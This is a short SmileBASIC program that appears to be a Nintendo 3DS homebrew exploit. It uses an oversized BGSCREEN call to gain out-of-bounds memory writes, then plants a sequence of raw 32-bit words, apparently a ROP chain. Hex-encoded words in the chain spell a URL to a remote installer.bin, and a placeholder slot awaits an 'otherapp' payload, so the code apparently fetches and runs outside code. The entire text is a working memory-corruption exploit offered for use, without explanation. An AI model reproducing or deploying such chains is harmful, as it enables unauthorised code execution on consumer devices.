OA$="<INSERT OTHERAPP HERE>"
BGSCREEN 0,1073741824,2
B0=BGGET(0,2,0)
B1=BGGET(0,2,1)
B=((B1 OR (B0 << 16))+16)/4
DEF W A,V
  BGPUT 0,A+0-B,0,V>>16
  BGPUT 0,A+0-B,1,V
END

W 0,&H0
W 1,&H400000
W 2,&H0
W 3,&H98
W 4,&H1
W 8,&H4
W 16,&H0
W 19,&H0
W 20,&H400000
W 21,&H0
W 23,&H0
W 24,&H400000
W 25,&H0
W 26,&H30010000
W 27,&H800
W 31,&H0
W 33,&H0
W 34,&H30010000
W 35,&H0
W 36,&H0
W 37,&H0

W 38,&H70747468
W 39,&H732F2F3A
W 40,&H6C61656D
W 41,&H672E6D75
W 42,&H75687469
W 43,&H6F692E62
W 44,&H7364332F
W 45,&H6F2F732F
W 46,&H755F646C
W 47,&H32336173
W 48,&H6E692F31
W 49,&H6C617473
W 50,&H2E72656C
W 51,&H6E6962

W -1,&H0
